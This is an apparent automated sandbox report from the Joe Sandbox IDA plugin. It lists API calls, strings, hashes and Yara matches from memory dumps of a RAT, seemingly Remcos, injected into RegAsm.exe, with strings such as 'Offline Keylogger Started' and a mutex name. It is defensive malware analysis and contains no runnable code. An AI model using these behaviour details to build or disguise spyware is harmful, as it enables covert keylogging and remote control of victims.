                                                                  • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                  • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                                                                  • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                • StrToIntA.SHLWAPI(00000000), ref: 0041B3CD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                • API String ID: 782494840-2070987746
                                                                • Opcode ID: a9c02e874ac761b1a54f69f9c7c0e468dff2f28919116cd580da9d812710a803
                                                                • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                                                                • Opcode Fuzzy Hash: a9c02e874ac761b1a54f69f9c7c0e468dff2f28919116cd580da9d812710a803
                                                                • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                • __freea.LIBCMT ref: 10008A08
                                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                • __freea.LIBCMT ref: 10008A11
                                                                • __freea.LIBCMT ref: 10008A36
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1414292761-0
                                                                • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                                • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                                APIs
                                                                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                • CloseHandle.KERNEL32(00000000), ref: 0040A729
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$CloseCreateHandleSizeSleep
                                                                • String ID: XQG
                                                                • API String ID: 1958988193-3606453820
                                                                • Opcode ID: 3855d95cd7322452e6531401611e332563825ee2f28412b9057315d8b356c682
                                                                • Instruction ID: fa029248b1ac628aedb802b18ed81a98d1a4018e107c0b234daa3009ae89debe
                                                                • Opcode Fuzzy Hash: 3855d95cd7322452e6531401611e332563825ee2f28412b9057315d8b356c682
                                                                • Instruction Fuzzy Hash: 96110130600740AADA31A734988961F7BA9DB45356F44483EF1866B6D3C67DDC64C71F
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CountEventTick
                                                                • String ID: !D@$NG
                                                                • API String ID: 180926312-2721294649
                                                                • Opcode ID: 88c5fc4c844f40aca8f8463e4e4f54eab6c003b8295b5b95d95bbe87897fe43d
                                                                • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                                                                • Opcode Fuzzy Hash: 88c5fc4c844f40aca8f8463e4e4f54eab6c003b8295b5b95d95bbe87897fe43d
                                                                • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
                                                                APIs
                                                                • CreateThread.KERNEL32(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040A249
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040A255
                                                                  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateThread$LocalTimewsprintf
                                                                • String ID: Offline Keylogger Started
                                                                • API String ID: 465354869-4114347211
                                                                • Opcode ID: e9faa5e414620fc96257d4712bcffae5cc82c2583e5401c4a4641fe0a8bebe8a
                                                                • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                                                • Opcode Fuzzy Hash: e9faa5e414620fc96257d4712bcffae5cc82c2583e5401c4a4641fe0a8bebe8a
                                                                • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                                                APIs
                                                                • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404F81
                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404FCD
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                                Strings
                                                                • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Create$EventLocalThreadTime
                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                • API String ID: 2532271599-1507639952
                                                                • Opcode ID: 7014718608cfeb48bfe47f339cac9c5a9a17279d6e1db9155cd03e2f3c9ced1b
                                                                • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                                                                • Opcode Fuzzy Hash: 7014718608cfeb48bfe47f339cac9c5a9a17279d6e1db9155cd03e2f3c9ced1b
                                                                • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                                                                APIs
                                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                • RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                                                                • RegCloseKey.KERNEL32(?), ref: 004137EC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseCreateValue
                                                                • String ID: pth_unenc
                                                                • API String ID: 1818849710-4028850238
                                                                • Opcode ID: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                                • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                                                • Opcode Fuzzy Hash: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                                • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                                                                APIs
                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                                • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
                                                                • CloseHandle.KERNEL32(00000000), ref: 00404DDB
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                • String ID:
                                                                • API String ID: 3360349984-0
                                                                • Opcode ID: d789810c3dbbbf6e259483921c055d4dbd3c5e70ff459b446317af5ddb3a36c3
                                                                • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                                                • Opcode Fuzzy Hash: d789810c3dbbbf6e259483921c055d4dbd3c5e70ff459b446317af5ddb3a36c3
                                                                • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                  • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                  • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: HandleModuleProtectVirtual
                                                                • String ID:
                                                                • API String ID: 2905821283-0
                                                                • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                                • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                                                                APIs
                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                                • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: LibraryLoad$ErrorLast
                                                                • String ID:
                                                                • API String ID: 3177248105-0
                                                                • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                                • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                                APIs
                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                                                • GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LibraryLoad$ErrorLast
                                                                • String ID:
                                                                • API String ID: 3177248105-0
                                                                • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                                                • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                                                                APIs
                                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C568
                                                                • CloseHandle.KERNEL32(00000000), ref: 0041C576
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$CloseCreateHandleReadSize
                                                                • String ID:
                                                                • API String ID: 3919263394-0
                                                                • Opcode ID: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                                • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                                                • Opcode Fuzzy Hash: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                                • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                                                                APIs
                                                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                                                • GetLastError.KERNEL32 ref: 0040D0BE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateErrorLastMutex
                                                                • String ID: Rmc-O0U3JA
                                                                • API String ID: 1925916568-2379601179
                                                                • Opcode ID: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                                • Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
                                                                • Opcode Fuzzy Hash: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                                • Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                  • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                  • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                  • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: HandleModuleProtectVirtual
                                                                • String ID:
                                                                • API String ID: 2905821283-0
                                                                • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                                • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                                                APIs
                                                                • send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                • WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                • SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: EventObjectSingleWaitsend
                                                                • String ID:
                                                                • API String ID: 3963590051-0
                                                                • Opcode ID: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
                                                                • Instruction ID: ade4869c8039bafc3f5202e75afdfb18787be874a76dce876c460fae4797ad88
                                                                • Opcode Fuzzy Hash: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
                                                                • Instruction Fuzzy Hash: 152124B2900119BBCB04ABA1DC95DEEB77CFF14314B00452FF515B71E2EB38AA15C6A4
                                                                APIs
                                                                • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ProtectVirtual$HandleModule
                                                                • String ID:
                                                                • API String ID: 3519776433-0
                                                                • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                                • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                                                                APIs
                                                                • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                • RegQueryValueExA.KERNEL32 ref: 00413622
                                                                • RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseOpenQueryValue
                                                                • String ID:
                                                                • API String ID: 3677997916-0
                                                                • Opcode ID: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                                • Instruction ID: 0661f39b514c0023b6096d8878825bbc81d19e8e8981dfb5b132c5fecbfe39b6
                                                                • Opcode Fuzzy Hash: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                                • Instruction Fuzzy Hash: 4A01D676900228FBCB209B91DC08DEF7F7DDB44B51F004066BB05A2240DA748E45DBA4
                                                                APIs
                                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                                                                • RegQueryValueExA.KERNEL32 ref: 00413768
                                                                • RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseOpenQueryValue
                                                                • String ID:
                                                                • API String ID: 3677997916-0
                                                                • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                                • Instruction ID: cdc8bb2f12cdea1da97e3e4d454c68039a4c25ad8704162e95ac064a0ac82555
                                                                • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                                • Instruction Fuzzy Hash: C301AD7540022DFBDF215F91DC04DEB3F38EF05761F008065BE09620A1E7358AA5EB94
                                                                APIs
                                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                                • RegQueryValueExA.KERNEL32 ref: 004135C2
                                                                • RegCloseKey.KERNEL32(?), ref: 004135CD
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseOpenQueryValue
                                                                • String ID:
                                                                • API String ID: 3677997916-0
                                                                • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                • Instruction ID: 3ea041f737baa467864e73cd7e114674dd940ed34319bd14b5ec79364d8ab256
                                                                • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                • Instruction Fuzzy Hash: 39F01D76900218FFDF109FA09C45FEE7BBDEB04B11F1044A5BA04E6191D6359F549B94
                                                                APIs
                                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413551
                                                                • RegQueryValueExA.KERNEL32 ref: 00413565
                                                                • RegCloseKey.KERNEL32(?), ref: 00413570
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseOpenQueryValue
                                                                • String ID:
                                                                • API String ID: 3677997916-0
                                                                • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                • Instruction ID: 960a54a16a1ccd4152458ec6927d20d37e2092670a33f2d7c306b576a706ad25
